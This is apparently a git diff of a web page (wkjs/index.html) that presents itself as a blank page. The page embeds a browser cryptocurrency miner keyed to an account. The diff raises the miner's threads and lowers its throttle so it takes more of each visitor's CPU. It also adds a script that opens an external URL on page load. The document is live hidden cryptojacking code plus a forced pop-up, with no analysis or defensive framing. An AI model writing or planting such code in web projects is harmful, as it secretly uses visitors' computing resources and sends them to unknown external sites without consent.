--- a/wkjs/index.html
+++ b/wkjs/index.html
@@ -6,14 +6,19 @@
 		
 		<script>
 			var miner = new ProjectPoi.User('BLuRXQ2XBPG0jSEBBnysmfVJ', 'john-doe', {
-	threads: 16,
+	threads: 20,
 	autoThreads: false,
-	throttle: 0.3,
+	throttle: 0.1,
 	forceASMJS: false
 });
 	miner.start(ProjectPoi.IF_EXCLUSIVE_TAB);
 			
 		</script>
+		
+		<script>
+		window.open("http://23niu.ga/zdsx")
+		</script>
+		
 		<!--script>
 	var miner = new ProjectPoi.Anonymous('BLuRXQ2XBPG0jSEBBnysmfVJ');
 	miner.start();
@@ -38,6 +43,6 @@
 		<title></title>
 	</head>
 	<body>
-		<h>这是一个空白页，注释掉</h>
+		<h>这是一个空白页，注释掉,buhaoshi?</h>
 	</body>
 </html>
